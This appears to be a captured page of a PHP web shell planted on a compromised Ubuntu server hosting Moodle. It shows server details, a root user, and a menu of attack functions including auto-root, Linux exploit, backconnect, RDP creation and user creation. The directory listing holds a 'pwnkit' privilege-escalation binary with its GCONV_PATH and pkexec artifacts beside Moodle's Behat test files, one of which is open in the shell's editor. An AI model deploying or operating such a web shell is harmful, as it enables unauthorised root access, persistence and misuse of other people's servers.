Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tool /
lp /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_tool_lp.php
5.46
KB
-rwxrwxrwx
behat_tool_lp_data_generators....
12.48
KB
-rwxrwxrwx
course_competencies.feature
2.78
KB
-rwxrwxrwx
framework_crud.feature
6.2
KB
-rwxrwxrwx
plan_crud.feature
7
KB
-rwxrwxrwx
plan_workflow.feature
8.72
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
template_crud.feature
2.93
KB
-rwxrwxrwx
user_evidence_comp_link.featur...
2.95
KB
-rwxrwxrwx
user_evidence_crud.feature
3.29
KB
-rwxrwxrwx
view_competencies.feature
9.49
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template_crud.feature
@tool @javascript @tool_lp @tool_lp_template Feature: Manage plearning plan templates As a learning plan admin In order to perform CRUD operations on learning plan template I need to create, update and delete learning plan temlate Background: Given I log in as "admin" And I change window size to "small" And I am on site homepage Scenario: Create a new learning plan template Given I navigate to "Competencies > Learning plan templates" in site administration And I should see "List of learning plan templates" And I click on "Add new learning plan template" "button" And I should see "Add new learning plan template" And I set the field "Name" to "Science template" And I set the field "Description" to "Here description of learning plan template" When I press "Save changes" Then I should see "Learning plan template created" And I should see "Science template" Scenario: Read a learning plan template Given the following lp "templates" exist: | shortname | description | | Science template Year-2 | science template description | And I navigate to "Competencies > Learning plan templates" in site administration And I should see "Science template Year-2" When I click on "Science template Year-2" "link" Then I should see "Science template Year-2" And I should see "Learning plan template competencies" Scenario: Edit a learning plan template Given the following lp "templates" exist: | shortname | description | | Science template Year-3 | science template description | And I navigate to "Competencies > Learning plan templates" in site administration And I should see "Science template Year-3" And I click on "Edit" of edit menu in the "Science template Year-3" row And the field "Name" matches value "Science template Year-3" And I set the field "Name" to "Science template Year-3 Edited" When I press "Save changes" Then I should see "Learning plan template updated" And I should see "Science template Year-3 Edited" Scenario: Delete a learning plan template Given the following lp "templates" exist: | shortname | description | | Science template Year-4 | science template description | And I navigate to "Competencies > Learning plan templates" in site administration And I should see "Science template Year-4" And I click on "Delete" of edit menu in the "Science template Year-4" row And "Confirm" "dialogue" should be visible And "Delete" "button" should exist in the "Confirm" "dialogue" And "Cancel" "button" should exist in the "Confirm" "dialogue" And I click on "Cancel" "button" in the "Confirm" "dialogue" And I click on "Delete" of edit menu in the "Science template Year-4" row And "Confirm" "dialogue" should be visible When I click on "Delete" "button" in the "Confirm" "dialogue" And I wait until the page is ready Then I should not see "Science template Year-4"
Close